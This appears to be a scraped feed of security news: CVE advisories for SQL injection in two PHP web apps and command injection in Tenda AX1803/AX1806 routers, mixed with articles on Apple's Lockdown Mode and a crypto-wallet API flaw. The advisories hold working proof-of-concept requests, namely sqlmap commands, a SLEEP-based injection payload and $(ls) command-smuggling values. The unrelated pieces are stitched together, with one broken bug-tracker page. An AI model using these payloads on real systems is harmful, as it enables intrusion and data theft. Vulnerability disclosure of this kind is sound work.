Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

Inout Homestay v2.2 was discovered to contain a SQL injection vulnerability via the guests parameter at /index.php?page=search/rentals.

**Information**

    Vulnerability Name  : Remote Blind SQL Injections in Inout Homestay
    Product             : Inout Homestay
    version             : 2.2
    Date                : 2022-05-26
    Vendor Site         : https://www.inoutscripts.com/products/inout-homestay/
    POC                 : https://github.com/bigb0x/CVEs/blob/main/Inout-Homestay-2-2-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Inout Homestay Version 2.2 suffers from time-based blind SQL injection. POST parameters "guests" is vulnerable to SQL imjection attacks.This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**Vulnerable Parameter: guests (POST)**

Vulnerability: time-based blind SQL injection in guests (POST) parameter. Vulnerabile file: index.php  

**Payload**

address\=3137 Laguna Street&guests\=1' AND (SELECT 1769 FROM (SELECT(SLEEP(5)))XPZb) AND
'ADfU'\='ADfU&indate\=01/01/1967&lat\=1&location\=1&long\=1&outdate\=01/01/1967&searchcity\=San Francisco&searchstate\=NY

  
**HTTP Post Request**

POST /index.php?page\=search/rentals HTTP/1.1
Content\-Type: application/x\-www\-form\-urlencoded
X\-Requested\-With: XMLHttpRequest
Referer: http://vlun\-host.com/
Cookie: currencyid\=10; currencycode\=BYR; language\=2; io\_lang\_code\=es
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vlun-host.com
Connection: Keep-alive
address=3&guests=-1 \[inject\_sql\_here\]&indate=01/01/1967&lat=1&location=1&long=1&outdate=01/01/1967&searchcity=San%20Francisco&searchstate=NY

  
**POC: sqlmap command:**

python sqlmap.py \-r homestay.txt  \-p guests \--dbms=MySQL --banner --random-agent --current-db --dbs --current-user

  
**output:**

  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-22: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed[at]gmail.com

CVE-2022-32055: CVEs/Inout-Homestay-2-2-sqli.md at main · bigb0x/CVEs

It was discovered that the IcedTea-Web used codebase attribute of the <applet> tag on the HTML page that hosts Java applet in the Same Origin Policy (SOP) checks. As the specified codebase does not have to match the applet's actual origin, this allowed malicious site to bypass SOP via spoofed codebase value.

'1256403?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2015-5236: Invalid Bug ID

Latest feature will protect against targeted attacks

Jessica Haworth 07 July 2022 at 15:30 UTC

Latest feature will protect against targeted attacks

  

Apple has launched a security bug bounty for its new Lockdown Mode feature, which aims to give users heightened protection against spyware attacks.

Lockdown Mode, which will ship with iOS 16, iPadOS 16, and macOS Ventura, is “an extreme, optional protection for the very small number of users who face grave, targeted threats to their digital security”.

The feature is designed to thwart against targeted attacks from the growing number of private companies developing mercenary spyware for nation-states around the world.

Announcing the news last night (July 6), Apple said it will be available to users this fall.

**Bug bounty offerings**

Apple also revealed it has established a new category within the Apple Security Bounty program to reward researchers who find Lockdown Mode bypasses and help improve its protections.

Bounties are doubled for qualifying findings in Lockdown Mode, up to a maximum of $2 million — one of the highest maximum bug bounty payouts in the industry.

Some of the optional protections on offer through Lockdown Mode include blocking attachments other than images and disabling link previews in messages.

It’s also possible to disable web technologies such as just-in-time (JIT) JavaScript compilation for untrusted websites, along with blocking communication requests, including FaceTime calls, if the user has not previously sent the initiator a call or request.

Read more of the latest news about spyware

Wired connections with a computer or accessory are also blocked when iPhone is locked, configuration profiles cannot be installed, and the device cannot enroll into mobile device management (MDM) while Lockdown Mode is turned on.

“Lockdown Mode is a groundbreaking capability that reflects our unwavering commitment to protecting users from even the rarest, most sophisticated attacks,” said Ivan Krstić, Apple’s head of security engineering and architecture.

“While the vast majority of users will never be the victims of highly targeted cyber-attacks, we will work tirelessly to protect the small number of users who are. That includes continuing to design defenses specifically for these users, as well as supporting researchers and organizations around the world doing critically important work in exposing mercenary companies that create these digital attacks.”

YOU MAY ALSO LIKE ‘Does anybody like CAPTCHAs?’ – Cloudflare CTO John Graham-Cumming envisages a frictionless future for website Turing tests

Lockdown Mode: Apple offers $2m bug bounty for vulnerabilities in new anti-spyware tech

Improper implementations of authentication APIs at a global crypto wallet service provider could have resulted in the loss of account control — and millions of dollars — from personal and business accounts.

A cryptocurrency wallet service provider serving more than 2 million users worldwide and managing about $3 billion worth of Bitcoin was found to contain API vulnerabilities tied to how external authentication logins were implemented. 

The bugs are fixed, but the discovery illustrates the high stakes involved in implementing APIs securely, researchers say — and the difficulties in doing so.  

According to a report shared with Dark Reading from Salt Labs, the research division of Salt Security, a series of vulnerabilities (CVEs were not assigned) could have allowed actors take over a large portion of a user's account in the system.  

This vulnerability would have given a malicious actor full access, along with the ability to perform multiple financial actions on behalf of that user, including the transfer of funds to any location of their choice.

"Once we successfully logged in to a user's accounts, we can potentially use any functionality available to the user, including funds transfer, viewing transactions history, seeing the user's personal data, which might include name, address, bank account number, and other valuable data," Salt researchers note in the report.

The first bug involved the common feature found in mobile apps that allow users to log in using an external service, like Apple ID, Google, Facebook, or Twitter. In this case, the researchers examined the "log in with Google" option — and found that the authentication token mechanism could be manipulated to accept a rogue Google ID as being that of the legitimate user.

The second bug allowed researchers to get around two-factor authentication. A PIN-reset mechanism was found to lack rate-limiting, allowing them to mount an automated attack to uncover the code sent to a user's mobile number or email.

"This endpoint does not contain any sort of rate limiting, user blocking, or temporary account disabling functionality. Basically, we can now run the entire 999,999 PIN options and get the correct PIN within less than 1 minute," according to the researchers.

Each security issue on its own provided limited abilities to the attacker, according to the report. "However, an attacker could chain these issues together to propagate a highly impactful attack, such as transferring the entire account balance to his wallet or private bank account."

Yaniv Balmas, vice president of research at Salt, explains there are two factors that made these vulnerabilities impactful and dangerous.

"First, it is very easily exploitable, and second, a successful exploitation could lead to millions of dollars — or more — being stolen from personal and business accounts," he says.

**Poor API Implementations: An Important Object Lesson**

As noted, the wallet-provider quickly fixed the API implementations in question, but there are important takeaways from the analysis, Balmas explains. After all, as the entire cryptocurrency market is relatively young, most of the services in this domain are heavily dependent on APIs as part of their core technologies.

"I have yet to see any cryptocurrency service that does not publish some sort of API to ease automated interactions with its functionalities," he says. “This reliance on APIs in turn surfaces another problem."

He explains API are designed to be dynamic and rapidly evolving interfaces for core business functionalities, which is obviously very positive from the user perspective.

"However, this same behavior opens the door for many security issues and vulnerabilities that may go unnoticed," he says. "Hence, we see with great frequency in our research efforts a relatively poor state of API security, sometimes with serious business implications."

**API Security Issues a Major Concern as Usage Grows**

As agile development grows in popularity, organizations are turning to APIs, resulting in broader attack surfaces more vulnerable to exploitation by threat actors. A recent analysis by application security firm Imperva and risk-strategy firm Marsh McLennan of breaches involving APIs revealed US companies face a combined $12 billion to $23 billion in losses in 2022.

Meanwhile, a March report from Salt Labs found API attacks increased a whopping 681% in the last year, with API attack traffic growing at more than twice the rate of nonmalicious traffic. Again, much of that could be due to implementation and configuration error: In May, for instance, Shadowserver Foundation researchers discovered that 380,000 Kubernetes API servers were open to the public Internet, representing 84% of all global Kubernetes API instances observable online.

**API Attack Surface Must Be Tracked, Monitored**

Balmas notes another issue with APIs and their nature is that once an API ecosystem gets big, it becomes very hard to have a complete handle on it. With multiple applications and internal services each publishing their own unique sets of APIs, it is very hard for the maintainers sometimes to even know which APIs are published at any given point in time.

"This is why API visibility and consolidation measures are sometimes the very first — and important — step to securing a company's APIs," he says.

Balmas recommends that cryptocurrency platforms, and any other heavy API users, should start paying more attention to the API attack surface that they expose.

"This new attack surface should be carefully tracked and monitored," he adds. "The services behind it should be more carefully reviewed on a periodic basis to make sure no new security issues have been introduced, and behavioral monitoring should be applied on the ongoing traffic to spot anomalies that might be happening in an effort to find and exploit vulnerabilities."

Buggy 'Log in With Google' API Implementation Opens Crypto Wallets to Account Takeover

Apple has announced a new feature called Lockdown Mode, designed to provide a safer environment on iOS for people at high risk of what Apple refers to as "mercenary spyware."
The post Apple Lockdown Mode helps protect users from spyware appeared first on Malwarebytes Labs.

Apple has announced a new feature of iOS 16 called Lockdown Mode. This new feature is designed to provide a safer environment on iOS for people at high risk of what Apple refers to as “mercenary spyware.” This includes people like journalists and human rights advocates, who are often targeted by oppressive regimes using malware like NSO Groups’ Pegasus spyware.

NSO is an Israeli software firm known for developing the Pegasus spyware. Pegasus has been in the spotlight frequently in recent years, and although NSO claims to limit who is allowed to have access to its spyware, each new finding shows it is used by authoritarian nations bent on monitoring and controlling critics. In one of the more infamous cases, and a classic example of how Pegasus has been used, journalist Jamal Khashoggi’s murder has been traced to the use of Pegasus by the United Arab Emirates.

**How is this possible? iPhones don’t get viruses!**

Contrary to popular belief, it is, in fact, possible for an iPhone to become infected with malware. However, this usually involves a fair bit of effort, usually the use of one or more vulnerabilities in iOS, the operating system for the iPhone. Such vulnerabilities have been known to sell for prices in the million dollar range, which puts such malware out of the reach of common criminals.

However, companies like NSO can purchase – or pay expert iOS reverse engineers to find – these vulnerabilities and incorporate them into a deployment system for their malware. They then sell access to this malware to make money.

Deploying the malware typically happens via something like a malicious text message, phone call, website, etc. For example, NSO has been known to use one-click vulnerabilities in Apple’s Messages app to infect a phone if a user taps a link. It’s also used more powerful zero-click vulnerabilities, capable of infecting a phone just by sending it a text. Because of this, Apple made changes in iOS 14 to harden Messages.

Messages is not the only possible avenue of attack, however, and it’s impossible to build a wall for the “walled garden” that doesn’t have some holes in it. Every bug is a potential avenue of attack, and all software has bugs. Thus, Apple has taken things to a new level by providing Lockdown Mode to high-risk individuals.

**What is Lockdown Mode?**

Lockdown Mode puts the iPhone into a state where it is more difficult to attack. This is done by limiting what is allowed in certain aspects of usage of the phone, to block potential avenues of attack. The improvements, per Apple’s press release, include:

*   Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
*   Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
*   Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
*   Wired connections with a computer or accessory are blocked when iPhone is locked.
*   Configuration profiles cannot be installed, and the device cannot enrol into mobile device management (MDM), while Lockdown Mode is turned on.

Source: Apple

Although Apple refers to Lockdown Mode as “an extreme, optional protection,” the limitations don’t actually sound particularly difficult to live with. Most users probably won’t turn this on, but these restrictions sound like something that the average user could adapt to fairly easily.

**Backing it up with big bucks**

To further bolster the security of Lockdown Mode, Apple is offering an unprecedented $2 million bug bounty to anyone who can find a qualifying vulnerability that can be exploited while an iPhone is in Lockdown Mode. Vulnerability hunters everywhere will be pounding on Lockdown Mode, looking for a bug that will score them the big payout. However, this bounty will also help to ensure that the vulnerability gets disclosed to Apple rather than being sold to a company like NSO. It’s easy to do the right thing when it also earns you $2 million!

**Should I use Lockdown Mode?**

If you’re a journalist and you cover topics that may put a target on your back, absolutely! If you’re a defender of human rights and a critic of countries that trample on those rights, don’t think twice.

Average people, though, will have little chance of ever encountering “mercenary spyware.” However, the extra security definitely wouldn’t hurt, and it looks like it won’t cost you a lot in terms of lost functionality.

Apple Lockdown Mode helps protect users from spyware

Apple on Wednesday announced it plans to introduce an enhanced security setting called Lockdown Mode in iOS 16, iPadOS 16, and macOS Ventura to safeguard high-risk users against "highly targeted cyberattacks."
The "extreme, optional protection" feature, now available for preview in beta versions of its upcoming software, is designed to counter a surge in threats posed by private companies

Apple on Wednesday announced it plans to introduce an enhanced security setting called **Lockdown Mode** in iOS 16, iPadOS 16, and macOS Ventura to safeguard high-risk users against "highly targeted cyberattacks."

The "extreme, optional protection" feature, now available for preview in beta versions of its upcoming software, is designed to counter a surge in threats posed by private companies developing state-sponsored surveillanceware such as Pegasus, DevilsTongue, Predator, and Hermit.

Lockdown Mode, when enabled, "hardens device defenses and strictly limits certain functionalities, sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware," Apple said in a statement.

This includes blocking most message attachment types other than images and disabling link previews in Messages; rendering inoperative just-in-time (JIT) JavaScript compilation; removing support for shared albums in Photos; and preventing incoming FaceTime calls from unknown numbers.

Other restrictions cut off wired connections with a computer or accessory when an iPhone is locked and, most importantly, prohibit configuration profiles — a feature that's been abused to sideload apps bypassing the App Store — from being installed.

The tech giant also noted that it plans to incorporate additional countermeasures to Lockdown Mode over time, while simultaneously inviting feedback from the security research community to identify "qualifying findings" that will be eligible for up to $2 million in bug bounties.

It's worth noting that the feature will not be switched on by default, but can be accessed by heading to Settings > Privacy & Security > Lockdown Mode.

The announcement arrives a month after Apple debuted a new Rapid Security Response feature in iOS 16 and macOS Ventura that aims to deploy security fixes without the need for a full operating system version update.

Google and Meta offer analogous software features known as Advanced Account Protection and Facebook Protect that are meant to secure the accounts of individuals who are at an "elevated risk of targeted online attacks" from takeover attempts. But it won't be surprising if Google follows suit with a similar feature on Android.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple's New "Lockdown Mode" Protects iPhone, iPad, and Mac Against Spyware

Apple's new Lockdown Mode protects devices targeted by sophisticated state-sponsored mercenary spyware attacks.

Apple today announced a new feature called Lockdown Mode that automatically locks down any system functionality that could be hijacked by even the most sophisticated, state-sponsored mercenary spyware to compromise a user device.

While Apple acknowledged in its statement announcing the initiative that the number of users who might need Lockdown Mode is small, protecting those who face grave cybersecurity threats is worth the effort, the company says.

"While the vast majority of users will never be the victims of highly targeted cyberattacks, we will work tirelessly to protect the small number of users who are," Ivan Krstić, Apple's head of security engineering and architecture, said about the new Lockdown Mode function. "That includes continuing to design defenses specifically for these users, as well as supporting researchers and organizations around the world doing critically important work in exposing mercenary companies that create these digital attacks."

Apple's Lockdown Mode will be available this fall with iOS 16, iPadOS 16, and macOS Ventura. When launched, Lockdown Mode will:

*   Block message attachment types other than images, and disable some features like link previews
*   Disable just-in-time JavaScript compilation unless the user specifically excludes a trusted site from restriction
*   Block incoming invitations, service requests, and FaceTime calls unless the user previously contacted the sender
*   Block wired connections with a computer or accessory when the iPhone is locked
*   Block the installation of configuration profiles and the device's enrollment in mobile device management (MDM)

Along with Apple's announcement of the new Lockdown Mode, the company said it would provide a $10 million cybersecurity grant to researchers working on ways to prevent these targeted attacks and offer a $2 million bug bounty for finding flaws in Lockdown Mode's protections.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Apple Debuts Spyware Protection for State-Sponsored Cyberattacks

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

Tag

#apple